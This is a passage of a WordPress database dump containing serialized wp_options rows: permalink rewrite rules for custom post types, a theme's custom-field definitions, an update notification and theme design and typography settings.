page=$matches[2]\";s:29:\"feedback/([^/]+)(/[0-9]+)?/?$\";s:47:\"index.php?feedback=$matches[1]&page=$matches[2]\";s:25:\"feedback/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"feedback/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"feedback/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"feedback/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"feedback/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"service/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"service/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"service/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"service/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"service/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:28:\"service/([^/]+)/trackback/?$\";s:34:\"index.php?service=$matches[1]&tb=1\";s:36:\"service/([^/]+)/page/?([0-9]{1,})/?$\";s:47:\"index.php?service=$matches[1]&paged=$matches[2]\";s:43:\"service/([^/]+)/comment-page-([0-9]{1,})/?$\";s:47:\"index.php?service=$matches[1]&cpage=$matches[2]\";s:28:\"service/([^/]+)(/[0-9]+)?/?$\";s:46:\"index.php?service=$matches[1]&page=$matches[2]\";s:24:\"service/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:34:\"service/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:54:\"service/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"service/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:49:\"service/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"slide/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"slide/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"slide/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"slide/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"slide/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:26:\"slide/([^/]+)/trackback/?$\";s:32:\"index.php?slide=$matches[1]&tb=1\";s:34:\"slide/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?slide=$matches[1]&paged=$matches[2]\";s:41:\"slide/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?slide=$matches[1]&cpage=$matches[2]\";s:26:\"slide/([^/]+)(/[0-9]+)?/?$\";s:44:\"index.php?slide=$matches[1]&page=$matches[2]\";s:22:\"slide/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"slide/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"slide/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"slide/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"slide/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"staff/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"staff/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"staff/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"staff/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"staff/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:26:\"staff/([^/]+)/trackback/?$\";s:32:\"index.php?staff=$matches[1]&tb=1\";s:34:\"staff/([^/]+)/page/?([0-9]{1,})/?$\";s:45:\"index.php?staff=$matches[1]&paged=$matches[2]\";s:41:\"staff/([^/]+)/comment-page-([0-9]{1,})/?$\";s:45:\"index.php?staff=$matches[1]&cpage=$matches[2]\";s:26:\"staff/([^/]+)(/[0-9]+)?/?$\";s:44:\"index.php?staff=$matches[1]&page=$matches[2]\";s:22:\"staff/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:32:\"staff/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:52:\"staff/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"staff/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:47:\"staff/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=9&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(/[0-9]+)?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(151,'nice_custom_fields','a:16:{i:0;a:4:{s:4:\"name\";s:9:\"page_info\";s:5:\"label\";s:16:\"Page Information\";s:4:\"type\";s:4:\"info\";s:4:\"desc\";s:290:\"You can select the page template from the \"Template\" dropdown on the \"Page Attributes\" box.</p><p>If you are using the \"Gallery Template\" plase be sure to upload images from the \"Add Media\" button at the top of this page. (Don\'t insert the gallery in the page content, just add the images).\";}i:1;a:4:{s:4:\"name\";s:14:\"page_sub_title\";s:5:\"label\";s:14:\"Page Sub Title\";s:4:\"type\";s:8:\"textarea\";s:4:\"desc\";s:77:\"Enter page sub title description here to be displayed in the top of the page.\";}i:2;a:4:{s:4:\"name\";s:10:\"slide_info\";s:5:\"label\";s:11:\"Slide Image\";s:4:\"type\";s:4:\"info\";s:4:\"desc\";s:251:\"Slides use the wordpress featured image as the slide image. Don\'t know what featured images are? How to use them? <a href=\"http://en.support.wordpress.com/featured-images/#setting-a-featured-image\">Take a look at wordpress docs on Featured Images</a>.\";}i:3;a:5:{s:4:\"name\";s:17:\"slide_description\";s:5:\"label\";s:17:\"Slide Description\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";s:4:\"desc\";s:73:\"Enter slide description here to be displayed in the slide navigation bar.\";}i:4;a:5:{s:4:\"name\";s:5:\"embed\";s:3:\"std\";s:0:\"\";s:5:\"label\";s:16:\"Video Embed Code\";s:4:\"type\";s:8:\"textarea\";s:4:\"desc\";s:103:\"Enter the video embed code for your video (YouTube, Vimeo or similar). Will show instead of your image.\";}i:5;a:5:{s:4:\"name\";s:3:\"url\";s:3:\"std\";s:0:\"\";s:5:\"label\";s:3:\"URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:79:\"Enter URL if you want to add a link to the uploaded image and title. (optional)\";}i:6;a:5:{s:4:\"name\";s:8:\"url_text\";s:3:\"std\";s:0:\"\";s:5:\"label\";s:23:\"Anchor Text for the URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:107:\"Enter Anchor text you would like to use for the URL button. (optional - will only work when the URL is set)\";}i:7;a:4:{s:4:\"name\";s:3:\"bio\";s:5:\"label\";s:8:\"Mini Bio\";s:4:\"type\";s:8:\"textarea\";s:4:\"desc\";s:23:\"Mini bio of this staff.\";}i:8;a:4:{s:4:\"name\";s:18:\"staff_facebook_url\";s:5:\"label\";s:12:\"Facebook URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:28:\"Facebook URL for this staff.\";}i:9;a:4:{s:4:\"name\";s:17:\"staff_twitter_url\";s:5:\"label\";s:11:\"Twitter URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:27:\"Twitter URL for this staff.\";}i:10;a:4:{s:4:\"name\";s:21:\"staff_google_plus_url\";s:5:\"label\";s:12:\"Google + URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:31:\"Google plus URL for this staff.\";}i:11;a:4:{s:4:\"name\";s:18:\"staff_linkedin_url\";s:5:\"label\";s:12:\"Linkedin URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:28:\"Linkedin URL for this staff.\";}i:12;a:5:{s:4:\"name\";s:5:\"embed\";s:3:\"std\";s:0:\"\";s:5:\"label\";s:16:\"Video Embed Code\";s:4:\"type\";s:8:\"textarea\";s:4:\"desc\";s:70:\"Enter the video embed code for your video (YouTube, Vimeo or similar).\";}i:13;a:4:{s:4:\"name\";s:18:\"feedback_item_info\";s:5:\"label\";s:14:\"Feedback Image\";s:4:\"type\";s:4:\"info\";s:4:\"desc\";s:262:\"Feedback Items use the wordpress featured image as the feedback image. Don\'t know what featured images are? How to use them? <a href=\"http://en.support.wordpress.com/featured-images/#setting-a-featured-image\">Take a look at wordpress docs on Featured Images</a>.\";}s:15:\"feedback_author\";a:4:{s:4:\"name\";s:15:\"feedback_author\";s:5:\"label\";s:15:\"Feedback Author\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:54:\"The name of the author of the feedback (e.g. John Doe)\";}s:12:\"feedback_url\";a:4:{s:4:\"name\";s:12:\"feedback_url\";s:5:\"label\";s:12:\"Feedback URL\";s:4:\"type\";s:4:\"text\";s:4:\"desc\";s:71:\"The URL to the feedback author e.g. http://www.johndoe.com - (optional)\";}}','yes'),(1922,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:24:\"jonathancalmus@gmail.com\";s:7:\"version\";s:6:\"3.9.19\";s:9:\"timestamp\";i:1494991996;}','yes'),(152,'nice_template','a:113:{i:0;a:2:{s:4:\"name\";s:16:\"General Settings\";s:4:\"type\";s:7:\"heading\";}i:1;a:5:{s:4:\"name\";s:7:\"Favicon\";s:4:\"desc\";s:17:\"Upload a favicon.\";s:2:\"id\";s:12:\"nice_favicon\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:2;a:7:{s:4:\"name\";s:16:\"Sidebar Position\";s:4:\"desc\";s:68:\"Select if you want to show the full content or the excerpt on posts.\";s:2:\"id\";s:21:\"nice_sidebar_position\";s:4:\"type\";s:6:\"select\";s:3:\"std\";s:5:\"right\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:2:{s:5:\"right\";s:21:\"Sidebar on right side\";s:4:\"left\";s:20:\"Sidebar on left side\";}}i:3;a:6:{s:4:\"name\";s:15:\"Post Author Box\";s:4:\"desc\";s:104:\"This will enable the post author box on the single posts page. Edit description in Users > Your Profile.\";s:2:\"id\";s:16:\"nice_post_author\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:4;a:6:{s:4:\"name\";s:26:\"Display Back To Top Button\";s:4:\"desc\";s:97:\"Enable if you want the Back To Top button to be displayed in the bottom right corner of the site.\";s:2:\"id\";s:16:\"nice_back_to_top\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:5;a:6:{s:4:\"name\";s:13:\"Call Now Text\";s:4:\"desc\";s:58:\"The Call Now text that will appear beside the phone number\";s:2:\"id\";s:18:\"nice_call_now_text\";s:3:\"std\";s:8:\"Call Now\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:6;a:6:{s:4:\"name\";s:13:\"Tracking Code\";s:4:\"desc\";s:55:\"Insert the code if you have one. Google analytics, etc.\";s:2:\"id\";s:18:\"nice_tracking_code\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:7;a:2:{s:4:\"name\";s:15:\"Design & Styles\";s:4:\"type\";s:7:\"heading\";}i:8;a:6:{s:4:\"name\";s:12:\"Accent Color\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:17:\"nice_accent_color\";s:3:\"std\";s:7:\"#3e7ec2\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:5:\"color\";}i:9;a:6:{s:4:\"name\";s:15:\"Secondary Color\";s:4:\"desc\";s:60:\"The background color for the buttons, telephone number, etc.\";s:2:\"id\";s:20:\"nice_secondary_color\";s:3:\"std\";s:7:\"#a2d678\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:5:\"color\";}i:10;a:6:{s:4:\"name\";s:10:\"Custom CSS\";s:4:\"desc\";s:62:\"Quickly add some CSS to your theme by adding it to this block.\";s:2:\"id\";s:15:\"nice_custom_css\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:11;a:2:{s:4:\"name\";s:6:\"Header\";s:4:\"type\";s:7:\"heading\";}i:12;a:5:{s:4:\"name\";s:11:\"Custom Logo\";s:4:\"desc\";s:21:\"Upload a custom logo.\";s:2:\"id\";s:9:\"nice_logo\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:13;a:5:{s:4:\"name\";s:20:\"Custom Logo (Retina)\";s:4:\"desc\";s:94:\"Upload a custom logo for retina displays. Upload at exactly 2x the size of your standard logo.\";s:2:\"id\";s:16:\"nice_logo_retina\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:14;a:5:{s:4:\"name\";s:11:\"Logo Height\";s:4:\"desc\";s:88:\"Change the logo height. This setting will standarize the logo height for retina devices.\";s:2:\"id\";s:16:\"nice_logo_height\";s:3:\"std\";a:5:{s:5:\"range\";s:3:\"min\";s:5:\"value\";s:2:\"70\";s:3:\"min\";s:2:\"10\";s:3:\"max\";s:3:\"400\";s:4:\"unit\";s:2:\"px\";}s:4:\"type\";s:6:\"slider\";}i:15;a:6:{s:4:\"name\";s:23:\"Header background Color\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:28:\"nice_header_background_color\";s:3:\"std\";s:7:\"#528bcb\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:5:\"color\";}i:16;a:5:{s:4:\"name\";s:23:\"Header background Image\";s:4:\"desc\";s:45:\"Upload or choose the header background image.\";s:2:\"id\";s:28:\"nice_header_background_image\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:17;a:7:{s:4:\"name\";s:30:\"Header background image repeat\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:35:\"nice_header_background_image_repeat\";s:3:\"std\";s:6:\"repeat\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:4:{s:9:\"no-repeat\";s:9:\"No Repeat\";s:6:\"repeat\";s:6:\"Repeat\";s:8:\"repeat-x\";s:19:\"Repeat horizontally\";s:8:\"repeat-y\";s:17:\"Repeat vertically\";}}i:18;a:7:{s:4:\"name\";s:32:\"Header background image position\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:37:\"nice_header_background_image_position\";s:3:\"std\";s:8:\"left top\";s:4:\"type\";s:6:\"select\";s:3:\"tip\";s:0:\"\";s:7:\"options\";a:9:{s:10:\"center top\";s:10:\"Center Top\";s:13:\"center center\";s:13:\"Center Center\";s:13:\"center bottom\";s:13:\"Center Bottom\";s:8:\"left top\";s:8:\"Left Top\";s:11:\"left center\";s:11:\"Left Center\";s:11:\"left bottom\";s:11:\"Left Bottom\";s:9:\"right top\";s:9:\"Right Top\";s:12:\"right center\";s:12:\"Right Center\";s:12:\"right bottom\";s:12:\"Right Bottom\";}}i:19;a:5:{s:4:\"name\";s:10:\"Text Title\";s:4:\"desc\";s:109:\"Enable if you want Blog Title and Tagline to be text-based. Setup title/tagline in WP -> Settings -> General.\";s:2:\"id\";s:14:\"nice_texttitle\";s:3:\"std\";s:5:\"false\";s:4:\"type\";s:8:\"checkbox\";}i:20;a:5:{s:4:\"name\";s:21:\"Site Title Typography\";s:4:\"desc\";s:67:\"Change the site title typography. ( Only if Text Title is enabled )\";s:2:\"id\";s:20:\"nice_font_site_title\";s:3:\"std\";a:4:{s:4:\"size\";s:2:\"30\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:4:\"#fff\";}s:4:\"type\";s:10:\"typography\";}i:21;a:2:{s:4:\"name\";s:6:\"Footer\";s:4:\"type\";s:7:\"heading\";}i:22;a:6:{s:4:\"name\";s:23:\"Enable Custom Copyright\";s:4:\"desc\";s:52:\"Enable if you want to write your own copyright text.\";s:2:\"id\";s:28:\"nice_custom_copyright_enable\";s:3:\"std\";s:5:\"false\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:23;a:6:{s:4:\"name\";s:21:\"Custom Copyright Text\";s:4:\"desc\";s:79:\"Please enter the copyright section text. e.g. All Rights Reserved, Nice Themes.\";s:2:\"id\";s:26:\"nice_custom_copyright_text\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:24;a:5:{s:4:\"name\";s:14:\"Footer Columns\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:19:\"nice_footer_columns\";s:3:\"std\";a:4:{s:5:\"range\";s:3:\"min\";s:5:\"value\";s:1:\"3\";s:3:\"min\";s:1:\"2\";s:3:\"max\";s:1:\"4\";}s:4:\"type\";s:6:\"slider\";}i:25;a:3:{s:4:\"name\";s:10:\"Typography\";s:4:\"type\";s:7:\"heading\";s:4:\"desc\";s:23:\"This is the description\";}i:26;a:5:{s:4:\"name\";s:24:\"Enable Custom Typography\";s:4:\"desc\";s:38:\"Enable if you want to pick your fonts.\";s:2:\"id\";s:22:\"nice_custom_typography\";s:3:\"std\";s:5:\"false\";s:4:\"type\";s:8:\"checkbox\";}i:27;a:5:{s:4:\"name\";s:18:\"General Typography\";s:4:\"desc\";s:24:\"Change the general font.\";s:2:\"id\";s:14:\"nice_font_body\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"13\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#757B83\";}s:4:\"type\";s:10:\"typography\";}i:28;a:5:{s:4:\"name\";s:10:\"Navigation\";s:4:\"desc\";s:27:\"Change the navigation font.\";s:2:\"id\";s:13:\"nice_font_nav\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"13\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";}s:4:\"type\";s:10:\"typography\";}i:29;a:5:{s:4:\"name\";s:10:\"Post Title\";s:4:\"desc\";s:22:\"Change the post title.\";s:2:\"id\";s:20:\"nice_font_post_title\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"30\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#43484D\";}s:4:\"type\";s:10:\"typography\";}i:30;a:5:{s:4:\"name\";s:9:\"Post Meta\";s:4:\"desc\";s:21:\"Change the post meta.\";s:2:\"id\";s:19:\"nice_font_post_meta\";s:3:\"std\";a:5:{s:4:\"size\";s:2:\"13\";s:4:\"unit\";s:2:\"px\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:0:\"\";s:5:\"color\";s:7:\"#BBBBBB\";}s:4:\"type\";s:10:\"typography\";}i:31;a:5:{s:4:\"name\";s:10:\"Post Entry\";s:4:\"desc\";s:22:\"Change the post 